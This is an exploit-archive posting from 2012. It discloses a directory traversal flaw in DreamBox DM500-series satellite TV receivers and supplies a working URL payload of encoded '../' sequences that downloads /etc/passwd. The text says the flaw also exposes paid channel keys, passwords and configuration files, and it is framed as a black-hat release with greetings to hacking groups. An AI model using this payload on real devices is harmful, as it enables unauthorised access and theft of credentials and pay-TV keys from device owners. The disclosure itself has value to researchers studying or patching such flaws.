mutant200s DreamBox Arbitrary File Download Vulnerability

2012-02-01T00:00:00
ID 1337DAY-ID-17470
Type zdt
Reporter k3vin mitnick
Modified 2012-02-01T00:00:00

Description

Exploit for multiple platform in category web applications

                                        
                                            # Exploit Title: mutant200s DreamBox  Arbitrary File Download Vulnerability
# Google Dork: 
# Date: 30/01 /2012
# Author: k3vin mitnick
# Software Link: 
# Version: 
# Tested on: 
# CVE : 

DreamBox DM500(+) Arbitrary File Download Vulnerability
Vendor: Dream Multimedia GmbH
Product web page: http://www.dream-multimedia-tv.de
Affected version: DM500, DM500+, DM500HD and DM500S
Summary: The Dreambox is a series of Linux-powered
DVB satellite, terrestrial and cable digital television
receivers (set-top box).
Desc: Dreambox suffers from a file download vulnerability
thru directory traversal with appending the '/' character
in the HTTP GET method of the affected host address. The
attacker can get to sensitive information like paid channel
keys, usernames, passwords, config and plug-ins info, etc.
Tested on: Linux dreambox 2.6.17-mutant200s 
Vulnerability discovered by: k3vin mitnick 
website : http://tunisianblackhat.blogspot.com/
exploit : 
http://192.168.1.xxx:80/%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
-----------------------------------------------------
greetz to tunisian blackhat team , tunisia hackspace , partipirate-tunisie.org , wiki.partipirate-tn.org , samychelly , ANSI.tn , fireboy , underhack , 
scraface team , wild_louzir ,ANIS , slim ammamou , haythem el mekki ... and  all tunisia hackers 
30/01/2012



#  0day.today [2018-03-20]  #